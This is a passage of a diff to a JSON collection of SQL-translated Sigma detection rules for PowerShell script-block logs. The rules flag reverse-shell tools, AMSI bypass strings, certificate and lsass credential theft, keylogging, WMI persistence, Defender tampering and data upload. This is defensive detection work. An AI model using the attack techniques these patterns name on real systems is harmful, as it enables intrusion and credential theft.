ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "status": "test", - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "author": "frack113", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Unknown" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "title": "Powershell MsXml COM Object", + "id": "78aa1347-1517-4454-9982-b338d6df8343", "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113, MatilJ", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_msxml_com.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "App-V clients" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", @@ -6775,48 +6661,67 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + ], + "filename": "posh_ps_psasyncshell.yml" + }, + { + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { "title": "Malicious ShellIntel PowerShell Commandlets", @@ -6838,193 +6743,196 @@ "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", - "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", - "author": "frack113", + "title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "status": "experimental", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1059.001", + "attack.t1106" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.collection", + "attack.t1114.001" ], "falsepositives": [ - "Legitimate administration scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Powershell MsXml COM Object", - "id": "78aa1347-1517-4454-9982-b338d6df8343", + "title": "Import PowerShell Modules From Suspicious Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "author": "frack113, MatilJ", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%MsXml2.%' ESCAPE '\\' AND ScriptBlockText LIKE '%XmlHttp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_msxml_com.yml" + "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.exfiltration", + "attack.t1020" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_upload.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Administrative scripts that use the same keywords." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], 